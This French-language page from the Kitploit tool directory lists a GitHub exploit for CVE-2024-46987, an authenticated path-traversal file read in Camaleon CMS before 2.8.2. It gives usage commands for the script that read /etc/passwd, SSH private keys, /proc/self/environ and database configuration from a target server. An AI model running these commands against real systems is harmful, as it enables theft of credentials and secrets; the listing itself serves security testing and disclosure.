Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-46987 — CVE-2024-46987 - Camaleon CMS LFI Exploit | Kitploit
Outils/GitHubGitHub/rival420/cve-2024-46987
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration TestingLearning & Education
GitHubrival420/cve-2024-46987

CVE-2024-46987

CVE-2024-46987 - Camaleon CMS LFI Exploit

Voir le dépôt
il y a 6 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-46987 - Inclusion Locale de Fichiers dans Camaleon CMS

Exploit d'Inclusion Locale de Fichiers (LFI) authentifié pour Camaleon CMS.

Vulnérabilité

Camaleon CMS est vulnérable à une attaque LFI authentifiée via le point de terminaison /admin/media/download_private_file. Le paramètre file n'est pas correctement assaini, ce qui permet un parcours de chemin pour lire des fichiers arbitraires sur le serveur.

Versions Affectées

  • Camaleon CMS < 2.8.2

Prérequis

root@kitploit:~
pip install requests

Utilisation

root@kitploit:~
# Afficher le fichier dans le terminal (par défaut)
python3 exploit.py -u http://example.com -f /etc/passwd -t "auth_token"

# Enregistrer dans un fichier
python3 exploit.py -u http://example.com -f /etc/passwd -t "auth_token" -o passwd.txt

Paramètres

Exemples

root@kitploit:~
# Lire le fichier passwd
python3 exploit.py -u https://example.com -f /etc/passwd -t "auth_token"

# Lire les clés SSH
python3 exploit.py -u https://example.com -f /home/user/.ssh/id_rsa -t "auth_token" -o id_rsa

# Lire les variables d'environnement
python3 exploit.py -u https://example.com -f /proc/self/environ -t "auth_token"

# Lire la configuration de l'application
python3 exploit.py -u https://example.com -f /var/www/html/config/database.yml -t "auth_token"

Avertissement

Cet outil est destiné uniquement aux tests de sécurité autorisés et à des fins éducatives. Utilisez-le uniquement contre des systèmes pour lesquels vous avez une autorisation explicite de test.

Références

  • CVE-2024-46987
  • Camaleon CMS
Télécharger l’outil
ParamètreDescription
-u, --urlURL cible
-f, --fileFichier à lire (ex. /etc/passwd)
-t, --tokenValeur du cookie auth_token
-o, --outputNom du fichier de sortie (optionnel, affiche dans le terminal si non défini)